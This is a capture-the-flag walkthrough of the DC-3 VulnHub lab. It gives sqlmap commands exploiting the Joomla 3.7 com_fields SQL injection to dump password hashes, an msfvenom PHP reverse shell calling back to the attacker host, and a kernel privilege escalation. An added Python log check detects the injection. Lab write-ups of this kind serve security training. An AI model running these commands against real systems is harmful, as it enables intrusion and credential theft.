01 Environment setup
- Target VM download: https://www.vulnhub.com/entry/dc-3,312/
- The challenge information is as follows
Description
DC-3 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
As with the previous DC releases, this one is designed with beginners in mind, although this time around, there is only one flag, one entry point and no clues at all.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.
For those with experience doing CTF and Boot2Root challenges, this probably won't take you long at all (in fact, it could take you less than 20 minutes easily).
If that's the case, and if you want it to be a bit more of a challenge, you can always redo the challenge and explore other ways of gaining root and obtaining the flag.
Technical Information
DC-3 is a VirtualBox VM built on Ubuntu 32 bit, so there should be no issues running it on most PCs.
Please note: There was an issue reported with DC-3 not working with VMware Workstation. To get around that, I recommend using VirtualBox, however, I have created a separate DC-3 VMware edition for those who can only use VMware.
It is currently configured for Bridged Networking, however, this can be changed to suit your requirements. Networking is configured for DHCP.
Installation is simple - download it, unzip it, and then import it into VirtualBox and away you go.
Important
While there should be no problems using this VM, by downloading it, you accept full responsibility for any unintentional damage that this VM may cause.
In saying that, there shouldn't be any problems, but I feel the need to throw this out there just in case.
Contact
I'm also very interested in hearing how people go about solving these challenges, so if you're up for writing a walkthrough, please do so and send me a link, or alternatively, follow me on Twitter, and DM me (you can unfollow after you've DM'd me if you'd prefer).
I can be contacted via Twitter - @DCAU7
02 Information gathering
Restore the target VM into VirtualBox, then start with the first step: information gathering.
Discovering the target
The attacking machine's IP address is 192.168.56.1 (the VM was imported with a Host-Only Adapter).
Use nmap to scan the IP addresses in the subnet:
nmap -sP 192.168.56.1/24
The host 192.168.56.18 found by the scan is the target VM's IP address.
Port scan
Use nmap to scan the target's open ports:
nmap -Pn -n -sV 192.168.56.18
The target has a single open TCP port, 80.
Web framework
Visiting the web page shows a hint that there is only one flag this time.
The nmap scan shows that the site runs Joomla!.
A dirb scan finds the admin login page at http://192.168.56.18/administrator/.
Visiting README.txt reveals the version is 3.7.
A search on exploit-db shows that this version has a SQL injection vulnerability.
03 Obtaining credentials
Use sqlmap to enumerate the databases on the target:
sqlmap -u "http://192.168.56.18/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --dbs --batch
You can also re-verify that this URL is injectable before enumerating the tables:
sqlmap -u "http://192.168.56.18/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --batch
A database named joomladb is found. Enumerate its tables:
sqlmap -u "http://192.168.56.18/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomladb --tables --batch
The results include a table named #__users. Enumerate its columns:
sqlmap -u "http://192.168.56.18/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomladb -T "#__users" --columns --batch
There was a problem with the Python interaction: I could not enter y at the prompt "do you want to use common column existence check?", so the column names could not be retrieved.
Guessing the column names instead yields the account name and the password hash:
sqlmap -u "http://192.168.56.18/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomladb -T "#__users" -C name,password --dump --batch
Use john to crack the hash. The plaintext password is snoopy.
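From the defender's side, the injection requests issued above leave a characteristic trace in the web server's access log: a com_fields request whose list[fullordering] parameter carries a SQL function instead of a sort order. The following Python check is an added example, not part of the original walkthrough; the log lines, the IP addresses, the user-agent strings and the allow-list pattern for legitimate sort orders are all constructed for illustration.

```python
import re
from urllib.parse import urlparse, parse_qs, unquote

# Constructed Apache combined-format log lines (not real traffic); the IPs and
# paths mirror the lab setup described in this walkthrough.
SAMPLE_LOG = """\
192.168.56.1 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml HTTP/1.1" 500 2311 "-" "sqlmap/1.4"
192.168.56.1 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=updatexml%28NULL%2Cconcat%280x7e%2Cversion%28%29%29%2CNULL%29 HTTP/1.1" 500 2399 "-" "sqlmap/1.4"
192.168.56.5 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 8120 "-" "Mozilla/5.0"
192.168.56.5 - - [01/Jan/2024:10:00:04 +0000] "GET /administrator/ HTTP/1.1" 200 4020 "-" "Mozilla/5.0"
"""

# Minimal parser for the fields we need: client IP, timestamp, method, path, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)

# A legitimate Joomla list ordering looks like "a.name ASC"; this allow-list is an
# assumption for the example. Anything else in list[fullordering] is suspicious.
ALLOWED_ORDERING = re.compile(r'^[a-z._]+ (ASC|DESC)$', re.IGNORECASE)
# MySQL functions typically seen in error-based and time-based injection payloads.
SQL_FUNCS = re.compile(r'\b(updatexml|extractvalue|concat|sleep|benchmark)\s*\(?', re.IGNORECASE)

def analyze_line(line):
    """Return a finding dict for a suspicious com_fields request, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlparse(m.group("path"))
    qs = parse_qs(url.query)  # percent-decodes both keys and values
    if qs.get("option") != ["com_fields"]:
        return None
    reasons = []
    for value in qs.get("list[fullordering]", []):
        value = unquote(value)  # second decode catches double-encoded payloads
        if SQL_FUNCS.search(value):
            reasons.append("sql function in list[fullordering]")
        elif not ALLOWED_ORDERING.match(value):
            reasons.append("unexpected list[fullordering] value")
    if not reasons:
        return None
    return {"ip": m.group("ip"), "ts": m.group("ts"),
            "status": int(m.group("status")), "reasons": reasons}

def scan_log(text):
    """Run analyze_line over every line of an access log and collect findings."""
    return [f for f in (analyze_line(l) for l in text.splitlines()) if f]
```

Both injection requests in the sample are flagged, while the ordinary article view and the admin login page are not.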
04 Getting a shell
Log in to http://192.168.56.18/administrator with the admin account. The PHP files of the templates can be edited from the admin panel, and these templates are reachable from outside.
Edit the index.php file of the Beez3 template.
Use msfvenom to generate a reverse shell and copy it into index.php:
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f raw > shell.php
Then use msfconsole to listen for the connection.
Any other webshell would also work.
05 Privilege escalation
After obtaining the reverse shell, search for SUID binaries; none that can be used for privilege escalation are found.
Check the Linux kernel version and search for kernel vulnerabilities.
A script identifies a vulnerability present in the current kernel.
Privilege escalation with CVE-2016-4557 succeeds, yielding the final flag.